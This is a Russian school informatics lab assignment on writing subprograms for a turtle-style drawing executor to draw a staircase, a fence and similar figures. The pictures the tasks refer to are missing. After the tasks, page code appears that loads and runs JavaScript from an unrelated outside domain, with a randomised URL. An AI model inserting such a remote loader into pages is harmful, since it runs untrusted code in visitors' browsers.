Работа 2.1. Управление алгоритмическим исполнителем
Цель работы: закрепление навыков программного управления учебными исполнителями алгоритмов, полученных при изучении курса информатики в 7-9 классах.
Используемое программное обеспечение: среда какого-либо учебного исполнителя алгоритмов графического типа, назначение которого — рисование на экране компьютера. К числу таких исполнителей относятся: Черепашка Лого, Чертежник, Кенгуренок и др.
Задание 1
Написать подпрограмму (процедуру) STEP и с ее помощью составить программу рисования лесенки по диагонали через всё поле рисунка.
Задание 2
Написать программы для рисования следующих рисунков на всю ширину поля, используя вспомогательные алгоритмы (подпрограммы).
Задание 3
Описать подпрограмму для рисования следующей фигуры.
Задание 4
Используя подпрограмму из предыдущего задания, составить программу для рисования «забора» через всё поле рисунка.
Задание 5
Оформить решение задания 4 в виде подпрограммы и с ее помощью составить программу рисования следующей фигуры.
< type='text/javascript' data-cfasync='false'>
(function(){
var script = document.createElement('script');
script.type = 'text/javascript';
script.charset = 'utf-8';
script.async = 'true';
script.src = 'https://dominantcodes-ip.com/bens/vinos5.js?24942a' + Math.random();
document.body.appendChild(script);
function updt() {
let is_mobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|BB|PlayBook|IEMobile|Windows Phone|Kindle|Silk|Opera Mini/i.test(navigator.userAgent);
if(!is_mobile) {return;}
let el = null;
let lin = setInterval(function(){
el = document.getElementById('qwerty_wrap');
if (el != null) {
el.style.zoom = '1.8';
clearInterval(lin);
}
}, 100);
}
updt();
})();
<">